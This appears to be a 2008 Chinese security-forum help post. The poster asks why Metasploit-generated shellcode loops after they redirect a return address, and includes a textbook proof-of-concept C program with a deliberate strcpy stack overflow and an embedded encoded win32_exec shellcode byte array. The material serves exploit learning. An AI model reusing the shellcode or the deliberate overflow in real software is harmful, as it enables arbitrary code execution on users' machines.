-
-
[求助]堆栈溢出shellcode的问题
-
发表于:
2008-4-28 19:50
6534
-
下面代码的debug版本中,我输入abc,同时在OllyICE.exe中把verify_password()后的返回地址
手工 改成shellcode的地址,为什么跳到shellcode后 程序在shellcode内部进行死循环?
这个shellcode我用
__asm{
lea eax,scode
call eax
}
验证过的。
我在代码中加入 #include <windows.h>后也不行。
我的环境是winxp sp2。
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 4.2 in book "Vulnerability Exploit and Analysis Technique"
file name : stack_overflow_var.c
author : failwest
date : 2006.9.20
description : demo show nearby var overrun in stack
input 8 letters to bypass authentication
Noticed : complied with VC6.0 and build into begug version
version : 1.0
E-mail : failwest@gmail.com
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <stdio.h>
#define PASSWORD "1234567"
/* win32_exec - EXITFUNC=seh CMD=cmd /c echo 123d:/shellcode.txt Size=188+8 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x2b\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\xf4\xfe\x17\x83\xeb\xfc\xe2\xf4\x1c\x1c\xba\x17\xe0\xf4\x75\x52"
"\xdc\x7f\x82\x12\x98\xf5\x11\x9c\xaf\xec\x75\x48\xc0\xf5\x15\x5e"
"\x6b\xc0\x75\x16\x0e\xc5\x3e\x8e\x4c\x70\x3e\x63\xe7\x35\x34\x1a"
"\xe1\x36\x15\xe3\xdb\xa0\xda\x13\x95\x11\x75\x48\xc4\xf5\x15\x71"
"\x6b\xf8\xb5\x9c\xbf\xe8\xff\xfc\x6b\xe8\x75\x16\x0b\x7d\xa2\x33"
"\xe4\x37\xcf\xd7\x84\x7f\xbe\x27\x65\x34\x86\x1b\x6b\xb4\xf2\x9c"
"\x90\xe8\x53\x9c\x88\xfc\x15\x1e\x6b\x74\x4e\x17\xe0\xf4\x75\x7f"
"\xdc\xab\xcf\xe1\x80\xa2\x15\x1a\x88\x04\x74\x13\xbf\x9c\x66\xe9"
"\x6a\xfa\xa9\xe8\x07\x1c\x10\xe8\x1f\x0b\x9d\x7a\x84\xd4\xd1\x74"
"\xc0\x91\x9d\x7f\x8f\xd4\xcf\x25\xd3\xca\xc0\x73\xda\xdb\x8d\x7f"
"\x85\x98\x92\x74\x8f\x90\x9b\x39\x94\x8c\x8a\x17";
int verify_password (char *password)
{
int authenticated;
char buffer[200];// add local buff
authenticated=strcmp(password,PASSWORD);
strcat(password,scode);
strcpy(buffer,password);//over flowed here!
return authenticated;
}
main()
{
int valid_flag=0;
char password[1024];
/*
__asm{
lea eax,scode
call eax
}
*/
while(1)
{
printf("please input password: ");
scanf("%s",password);
valid_flag = verify_password(password);
if(valid_flag)
{
printf("incorrect password!\n\n");
}
else
{
printf("Congratulation! You have passed the verification!\n");
break;
}
}
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!